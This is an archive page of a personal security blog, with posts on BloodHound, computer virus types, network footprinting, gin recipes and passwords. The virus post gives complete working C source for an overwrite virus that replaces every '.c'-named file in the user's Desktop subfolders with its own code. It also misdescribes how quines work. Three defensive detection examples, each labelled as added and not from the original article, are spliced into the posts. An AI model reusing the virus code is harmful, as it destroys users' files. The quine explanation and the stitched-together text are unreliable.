19 Dec 2020

Bloodhound writeup soon

Despite the ongoing Corona pandemic and the current lockdown situation, I finally get some time to do a major writeup on the tool bloodhound. Since this is going to be a long post, it will take quite some weeks to finish I guess.

Figure 1: bloodhoundAD.png (https://bloodhound.readthedocs.io/en/latest/)

For those who are not familiar with bloodhound yet, check it out on GitHub!

Tags: news update
17 Oct 2020

Virus

And I'm not talking about the Corona one here.

Definition

A computer virus is a type of malicious software program ("malware") that, when executed, replicates itself by modifying other computer programs and inserting its own code. Besides executable programs, the infection can also reach data files or the "boot" sector of the hard drive. When this replication succeeds, the affected areas are then said to be "infected" with a computer virus.

Macro Virus

A macro virus searches for other files with a specific file extension and then appends its own code to the file content. The most popular file extensions used by this type of virus are:

  • .exe
  • .com
  • .bat
  • .cmd
  • .doc
  • .jar
  • .vbs

Overwrite Virus

Similar to a macro virus. The difference here is that the target file's content is replaced by the source code of the virus instead of being appended to.

Polymorph Virus

This sort of virus hides its presence by encrypting its own code. This process is structured into two parts:

  1. Virus decryption routine

    This routine decrypts the encrypted virus body back to its original form, so the virus can perform its activities.

  2. Virus encryption routine

    After performing its activities the virus encrypts its body back into an unreadable form. The decryption routine stays the same across generations. With this strategy the virus tries to evade the antivirus (AV) protection on the operating system.

Metamorphic Virus

Like the polymorphic version, this type of virus changes its appearance. The difference here is that it uses a new encryption algorithm every time it starts the encryption routine, so the decryption routine changes as well.
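The reason the distinction between polymorphic and metamorphic matters for defenders is visible in a simple signature check. The following is an added example written for this post, not code from the original article: it uses three constructed ASCII placeholder "samples" (no real malware bytes) that stand in for two generations of a polymorphic virus and one metamorphic rewrite, and a wildcard signature for the constant decryption routine. The sample strings, the `?` wildcard convention and the function names are all assumptions of this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed samples standing in for three generations of an encrypting
 * virus. They are ASCII placeholders, not bytes of any real malware: a short
 * "decryptor" header, a '|' separator, then the "encrypted" body. */
static const char *SAMPLE_GEN1 = "STUB:xor k=3|q8f3k2l9x0";  /* generation 1 */
static const char *SAMPLE_GEN2 = "STUB:xor k=9|zz71mm4o3p";  /* same routine, new key and body */
static const char *SAMPLE_META = "loop:add k=5|b09as8u7dn";  /* metamorphic: routine rewritten */

/* Signature for the constant decryptor. '?' matches any single byte, so the
 * key that changes between generations does not break the match. */
static const char *STUB_SIGNATURE = "STUB:xor k=?|";

/* Naive wildcard pattern search over a byte buffer, the core of a static
 * signature check. Returns the offset of the first match, or -1 if absent. */
long find_signature(const unsigned char *buf, size_t len,
                    const char *sig, size_t siglen)
{
    if (siglen == 0 || siglen > len)
        return -1;
    for (size_t i = 0; i + siglen <= len; i++) {
        size_t j = 0;
        while (j < siglen && (sig[j] == '?' || (unsigned char)sig[j] == buf[i + j]))
            j++;
        if (j == siglen)
            return (long)i;
    }
    return -1;
}

/* Does the decryptor signature hit this sample? 1 = yes, 0 = no. */
int stub_signature_hits(const char *sample)
{
    return find_signature((const unsigned char *)sample, strlen(sample),
                          STUB_SIGNATURE, strlen(STUB_SIGNATURE)) >= 0;
}

/* What a signature on the encrypted body would see: the bodies of two
 * generations are never byte-identical, so such a signature cannot work. */
int bodies_identical(const char *a, const char *b)
{
    const char *ba = strchr(a, '|');
    const char *bb = strchr(b, '|');
    if (!ba || !bb)
        return 0;
    return strcmp(ba + 1, bb + 1) == 0;
}

int main(void)
{
    printf("gen1 stub hit: %d\n", stub_signature_hits(SAMPLE_GEN1));   /* 1 */
    printf("gen2 stub hit: %d\n", stub_signature_hits(SAMPLE_GEN2));   /* 1 */
    printf("meta stub hit: %d\n", stub_signature_hits(SAMPLE_META));   /* 0 */
    printf("gen1/gen2 bodies identical: %d\n",
           bodies_identical(SAMPLE_GEN1, SAMPLE_GEN2));                /* 0 */
    return 0;
}
```

The polymorphic generations share the stub, so one wildcard signature catches both even though their bodies differ; the metamorphic sample rewrites the stub itself and slips past the same signature, which is why scanners fall back on emulation or behavioural detection for that class.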

Quine Virus

A virus that copies its source code to another file while using only one pointer. Normally a program needs two pointers (one source and one target pointer). These pointers are needed to copy data from source to target. More can be found here: Quine (computing)

Basic Overwrite Virus

This is some code written in the C programming language. The example changes to /home/desktop and scans its subdirectories. Every file in this directory and in the first layer of subdirectories whose name contains a c* extension is overwritten, which in this case infects files such as .com, .cmd or .c. For the sake of clarity and debugging, error messages are printed so the process can be followed. The code is designed with Unix-like operating systems in mind.

#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <pwd.h>

char pathToTargetFiles [1024];
char pathToLastOrigin [1024];
char arrayOfDirectorys[2048][1024];

void getSubDirectorys()
{
    int i = 0;
    DIR *dire;
    struct dirent *ent;

    if ((dire = opendir (pathToTargetFiles)) != NULL) 
    {
	while ((ent = readdir (dire)) != NULL) 
	{
	    char *isItADirectory = ent->d_name;

	    if(opendir(isItADirectory) && !(strstr(isItADirectory, "."))) 
	    {
		strcpy(arrayOfDirectorys[i], isItADirectory);
		i++;
	    }    
	}

	closedir (dire);
    }
    else 
    {
	perror ("Could not open recursive directory");
    }
}

//copy own source code to any c file in current directory
void infectFiles()
{
    int copyCodeToFile;
    FILE *fp1, *fp2;

    DIR *d;
    struct dirent *dir;
    d = opendir(".");

    if(d)
    {
	while((dir = readdir(d)) != NULL)
	{
	    char *currentFilePointer = dir->d_name;

	    //we look for all c files in current directory
	    if( strstr(currentFilePointer, ".c"))
	    {
		printf("We should open %s to write our code in it!\n", currentFilePointer);
		fp1 = fopen(pathToLastOrigin, "r");
		fp2 = fopen(currentFilePointer, "w");

		if(fp1 == NULL || fp2 == NULL)
		{
		    fclose(fp1);
		    fclose(fp2);
		    continue;
		}   
		else
		{
		    copyCodeToFile = fgetc(fp1);

		    while (copyCodeToFile != EOF)
		    {
			fputc(copyCodeToFile, fp2);
			copyCodeToFile = fgetc(fp1);
		    }

		    fclose(fp1);
		    fclose(fp2);
		}
	    }
	}
    }

    closedir(d);
}

//way to home dir
void pathTravaller()
{
    //getting user home directory
    struct passwd *pw = getpwuid(getuid());
    const char *homedir = pw->pw_dir;
    if(homedir == NULL)
	printf("Could not find home directory");

    strcpy(pathToTargetFiles, homedir);
    strcat(pathToTargetFiles, "/Desktop");

    //getting path to source code
    char cwd[1024];
    if (getcwd(cwd, sizeof(cwd)) == NULL)
	printf("Could not find current working directory");

    strcpy(pathToLastOrigin, cwd);
    char sourceFile [] = __FILE__;
    char addSlash [100] = "/";

    strcat(addSlash, sourceFile);
    strcat(pathToLastOrigin, addSlash);

    //finally change in the Desktop directory
    chdir(pathToTargetFiles);

    //getting first layer of subdirectorys
    getSubDirectorys();

    int z = 0;

    //change in every subdirectory and infect all c files
    while(!chdir(arrayOfDirectorys[z]))
    {
	printf("%d\n", z);
	printf("%s\n", arrayOfDirectorys[z]);
	infectFiles();
	chdir(pathToTargetFiles);
	z++;
    }
}

int main()
{
    pathTravaller();

    return 0;
}
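The defensive counterpart to the overwrite virus above is file-integrity monitoring: record a content hash per file, compare later, and treat a group of changed files that have become byte-identical as the tell-tale pattern (every victim ends up as a copy of the same source). The following is an added example written for this post, not part of the original article. The "before" and "after" snapshots are constructed in-memory entries, not real files, and the function names, FNV-1a choice and the placeholder "copied source" text are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NFILES 3

struct entry {
    const char *name;
    const char *content;
};

/* Constructed "before" snapshot of a directory (no real files are read). */
static const struct entry BEFORE[NFILES] = {
    {"hello.c",   "int main(void) { return 0; }\n"},
    {"util.c",    "int add(int a, int b) { return a + b; }\n"},
    {"notes.txt", "todo: refactor\n"},
};

/* Constructed "after" snapshot: both .c files now hold the same foreign
 * text, which is what an overwrite infection leaves behind. */
static const struct entry AFTER[NFILES] = {
    {"hello.c",   "/* placeholder for a copied source */ int main(void) { return 1; }\n"},
    {"util.c",    "/* placeholder for a copied source */ int main(void) { return 1; }\n"},
    {"notes.txt", "todo: refactor\n"},
};

/* FNV-1a 64-bit hash: a cheap, deterministic content fingerprint. */
uint64_t fnv1a64(const unsigned char *buf, size_t len)
{
    uint64_t h = 0xcbf29ce484222325ULL;
    for (size_t i = 0; i < len; i++) {
        h ^= buf[i];
        h *= 0x100000001b3ULL;
    }
    return h;
}

static uint64_t hash_entry(const struct entry *e)
{
    return fnv1a64((const unsigned char *)e->content, strlen(e->content));
}

/* Record a baseline: one hash per file, in file order. */
void build_baseline(const struct entry *files, size_t n, uint64_t *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = hash_entry(&files[i]);
}

/* Compare a later snapshot with the baseline. changed[i] becomes 1 for every
 * file whose content no longer matches; returns the number of changed files. */
size_t diff_against_baseline(const uint64_t *baseline, const struct entry *files,
                             size_t n, int *changed)
{
    size_t count = 0;
    for (size_t i = 0; i < n; i++) {
        changed[i] = hash_entry(&files[i]) != baseline[i];
        count += (size_t)changed[i];
    }
    return count;
}

/* Among the changed files, size of the largest set sharing identical content.
 * A group of two or more is the overwrite-virus pattern. */
size_t largest_identical_group(const struct entry *files, size_t n, const int *changed)
{
    size_t best = 0;
    for (size_t i = 0; i < n; i++) {
        if (!changed[i])
            continue;
        uint64_t hi = hash_entry(&files[i]);
        size_t group = 0;
        for (size_t j = 0; j < n; j++)
            if (changed[j] && hash_entry(&files[j]) == hi)
                group++;
        if (group > best)
            best = group;
    }
    return best;
}

/* Number of files that differ between the two constructed snapshots. */
size_t count_changed_files(void)
{
    uint64_t baseline[NFILES];
    int changed[NFILES];
    build_baseline(BEFORE, NFILES, baseline);
    return diff_against_baseline(baseline, AFTER, NFILES, changed);
}

/* Full check: size of the largest group of changed, content-identical files. */
size_t detect_overwrite_infection(void)
{
    uint64_t baseline[NFILES];
    int changed[NFILES];
    build_baseline(BEFORE, NFILES, baseline);
    diff_against_baseline(baseline, AFTER, NFILES, changed);
    return largest_identical_group(AFTER, NFILES, changed);
}

int main(void)
{
    printf("%zu file(s) changed, largest identical group: %zu\n",
           count_changed_files(), detect_overwrite_infection());   /* 2 and 2 */
    return 0;
}
```

On the constructed data the two .c files are flagged as changed and form an identical-content group of size 2, while notes.txt is untouched. In a real deployment the baseline would be stored out of reach of the monitored directory and a cryptographic hash would replace FNV-1a, which is only a fingerprint, not tamper-resistant.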

Quine virus example

The following code snippet illustrates how a quine virus would work. As can be seen, this can be achieved via recursion.

int main()
{
    printf("int main() \n { \n printf(\"int main() \n { \n printf(\"int main ...
}

However, this one would never end, so it is only usable for illustration purposes.

As always, more useful resources on this topic can be found on Wikipedia.

Tags: security virus code
19 Jun 2020

Footprints

Footprinting

Footprinting, often simply called recon (short for reconnaissance), is the uninteresting part for some people when it comes to attacking systems. Many want to start exploiting as soon as possible, if not looting. Yet the pre-attack phase is crucial for a successful attack. As Mr. Bishop used to say in The Mechanic: "Amat Victoria Curam" - victory loves preparation.

What is essential for good recon?

Much patience and above all thorough work! Now and then also a good portion of creativity. Often it takes quite a while to gather enough information about your target in the recon phase. Sometimes small details are overlooked, which is why thorough work and exact analysis are extremely important.

Here are a few examples of such oversights:

  • Not all hosts in the network were scanned
  • Not all ports were scanned with nmap
  • UDP ports were not scanned [1]
  • Overlooking interesting hosts in large IP ranges

Passive or Active

There are two methods of footprinting: the passive and the active one. With the first method, information is collected without performing targeted scans against a system. For example, one can search through the target's website or for entries in the public WHOIS registry. This variant is considerably more stealthy, since no intrusion detection systems (IDS) are being triggered. The second method generates much more "noise" in the network, and firewalls/IDS in particular are not very happy if ping sweeps are performed. Therefore it is important to set up the scanners used in a way that they produce as little "noise" as possible. The lower the scan aggressiveness is set (e.g. the T parameter in nmap), the "quieter" such scans can be performed. The disadvantage is that these scans take much more time than aggressive ones.
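Seen from the IDS side that the paragraph mentions, a ping sweep is easy to spot: one source sends ICMP echo requests to many distinct hosts in a short window. The following is an added example written for this post, not code from the original article. It runs a small detector over constructed tcpdump-style lines (no real capture); the line format, the threshold and the function names are assumptions of this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_TARGETS 64
#define ADDR_LEN 32

/* Constructed tcpdump-style lines (no real capture): one host probing six
 * addresses in a row (with one retry), one host with a single probe, a reply,
 * and an unrelated TCP line that must be ignored. */
static const char *CAPTURE[] = {
    "12:00:01.000000 IP 10.0.0.5 > 10.0.0.1: ICMP echo request, id 7, seq 1, length 64",
    "12:00:01.010000 IP 10.0.0.5 > 10.0.0.2: ICMP echo request, id 7, seq 1, length 64",
    "12:00:01.020000 IP 10.0.0.5 > 10.0.0.3: ICMP echo request, id 7, seq 1, length 64",
    "12:00:01.030000 IP 10.0.0.5 > 10.0.0.4: ICMP echo request, id 7, seq 1, length 64",
    "12:00:01.040000 IP 10.0.0.5 > 10.0.0.6: ICMP echo request, id 7, seq 1, length 64",
    "12:00:01.050000 IP 10.0.0.5 > 10.0.0.7: ICMP echo request, id 7, seq 1, length 64",
    "12:00:01.060000 IP 10.0.0.5 > 10.0.0.7: ICMP echo request, id 7, seq 2, length 64",
    "12:00:01.100000 IP 10.0.0.3 > 10.0.0.5: ICMP echo reply, id 7, seq 1, length 64",
    "12:00:02.000000 IP 10.0.0.9 > 10.0.0.1: ICMP echo request, id 3, seq 1, length 64",
    "12:00:02.500000 IP 10.0.0.9.51234 > 10.0.0.1.80: Flags [S], seq 1, win 64240, length 0",
};
#define CAPTURE_LINES (sizeof(CAPTURE) / sizeof(CAPTURE[0]))

/* Parse "<ts> IP <src> > <dst>: ICMP echo request ..." into src and dst
 * (each buffer at least ADDR_LEN bytes). Returns 1 for an echo request line,
 * 0 for anything else. */
int parse_echo_request(const char *line, char *src, char *dst)
{
    if (sscanf(line, "%*s IP %31[^ ] > %31[^:]: ICMP echo request", src, dst) != 2)
        return 0;
    /* sscanf already returned 2 after dst, so the ICMP part is checked here */
    return strstr(line, ": ICMP echo request") != NULL;
}

/* Count the distinct echo-request destinations sent by one source address. */
size_t count_echo_targets(const char *const *lines, size_t n, const char *source)
{
    char seen[MAX_TARGETS][ADDR_LEN];
    size_t nseen = 0;
    char src[ADDR_LEN], dst[ADDR_LEN];

    for (size_t i = 0; i < n; i++) {
        if (!parse_echo_request(lines[i], src, dst) || strcmp(src, source) != 0)
            continue;
        size_t k = 0;
        while (k < nseen && strcmp(seen[k], dst) != 0)
            k++;
        if (k == nseen && nseen < MAX_TARGETS)
            strcpy(seen[nseen++], dst);
    }
    return nseen;
}

/* A source that probed at least `threshold` distinct hosts is flagged as a sweep. */
int is_ping_sweep(const char *const *lines, size_t n, const char *source, size_t threshold)
{
    return count_echo_targets(lines, n, source) >= threshold;
}

int main(void)
{
    const char *sources[] = {"10.0.0.5", "10.0.0.9"};
    for (size_t i = 0; i < 2; i++)
        printf("%s probed %zu host(s), sweep: %d\n", sources[i],
               count_echo_targets(CAPTURE, CAPTURE_LINES, sources[i]),
               is_ping_sweep(CAPTURE, CAPTURE_LINES, sources[i], 5));
    return 0;
}
```

With a threshold of five distinct hosts, 10.0.0.5 is flagged (six targets, the retry to 10.0.0.7 counted once) and 10.0.0.9 is not; the echo reply and the TCP SYN line are ignored by the parser. A slow scan spreads the same probes over a much longer window, which is exactly why the paragraph's low-aggressiveness setting makes detection harder for a counter like this one unless it also keeps per-source state over time.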

Sniffing

Sniffing can be very time consuming. But even here, important information such as host names, network size, subnets or domain controllers can be found out. For a neat overview and easy filtering I would recommend wireshark. If no GUI is available, you can alternatively use the wireshark-cli or tcpdump.

Toolset

Of course the right toolset always depends on which target is chosen. So if you were to attack a wireless network you would use the Aircrack-ng suite. For local networks both nmap and wireshark are indispensable.

A list of common tools as they can be found in Kali Linux:

  • nmap
  • sparta
  • tcpdump
  • Bettercap2
  • arpspoof

Footnotes:

[1] UDP scans take much longer and are less accurate, but open ports can still be found.

Tags: security hacking
24 May 2020

Gin Recipes

There are different ways to drink and mix gin. Mixing ratios vary from 1:1 to 1:4 depending on taste. Some combinations require ice cubes, others require gin at room temperature or a pre-cooled glass.

General preparation

  1. Pour gin into a glass.
  2. Add tonic water. It is best to open the tonic bottle just before pouring, so that as little carbon dioxide is lost as possible.
  3. Add ice cubes (optional).
  4. Place fruits/herbs in the glass.
  5. Mix carefully with a cocktail stick or similar.

ROKU Gin

This gin has a mild taste of cherry blossoms and fruits. Naturally berries or other fruits go best with it.

Soft Nashi

  • Gin: 4cl
  • Tonic: Fever Tree Elderflower
  • Fruits: Nashi quarter cut
  • Herbs: Thyme
  • Ice cubes: 2x
  • Ratio: 1:4

Fresh Lime

  • Gin: 4cl
  • Tonic: Schweppes Dry
  • Fruits: Lime + orange skin
  • Herbs: -
  • Ice cubes: 2x
  • Ratio: 1:3

Thomas Dakin

Dakin has a strong scent of citrus and lemon. It can be paired with Tonic waters like 1724 or the ones listed below.

The One

  • Gin: 5cl
  • Tonic: Fever Tree Classic
  • Fruits: Cucumber
  • Herbs: -
  • Ice cubes: 3x
  • Ratio: 1:3

Forest

  • Gin: 4cl
  • Tonic: Fentimans 19:05 Herbal Tonic Water
  • Fruits: -
  • Herbs: -
  • Ice cubes: 4x
  • Ratio: 1:4

Tags: fun
27 Apr 2019

Strong Passwords

Or how to not create weak ones

Most of the time people create passwords instead of passphrases in order to protect their accounts and/or sensitive information. The following picture speaks for itself on how to do it the right way:

Figure 1: password_strength.jpg (https://xkcd.com/936/)

Tags: security passwords

This site belongs to Ioannis Gkourgkoutas and the content is published under CC BY-NC-SA 4.0 license.